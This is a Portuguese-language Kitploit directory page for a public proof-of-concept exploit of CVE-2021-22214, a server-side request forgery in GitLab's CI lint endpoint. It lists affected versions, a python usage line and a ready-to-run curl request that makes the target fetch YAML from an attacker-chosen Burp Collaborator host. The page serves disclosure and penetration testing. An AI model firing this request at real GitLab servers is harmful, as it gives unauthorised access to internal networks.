Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
GitLab-SSRF-CVE-2021-22214 — Prova de conceito de exploit para CVE-2021-22214, uma falsificação de solicitação do lado do servidor (SSRF) em webhooks do GitLab, permitindo que atacantes não autenticados façam solicitações HTTP internas. | Kitploit
Ferramentas/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança Web
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

Prova de conceito de exploit para CVE-2021-22214, uma falsificação de solicitação do lado do servidor (SSRF) em webhooks do GitLab, permitindo que atacantes não autenticados façam solicitações HTTP internas.

Ver Repositório
Site
313há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22214

POC para CVE-2021-22214: Gitlab SSRF

Descrição

A instalação remota do GitLab contém uma vulnerabilidade de Server-side request forgery (SSRF) como resultado da rede interna para webhooks estar habilitada. Um atacante remoto não autenticado pode explorar uma instância do GitLab com registro limitado, fazendo com que ela realize requisições HTTP para um domínio arbitrário escolhido pelo atacante.

Uso

  • código python

    root@kitploit:~
    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>
    
  • Comando curl

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

Afetados

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

Referência

  • GitLab SSRF (CVE-2021-22214)
  • tenable.com
Baixar ferramenta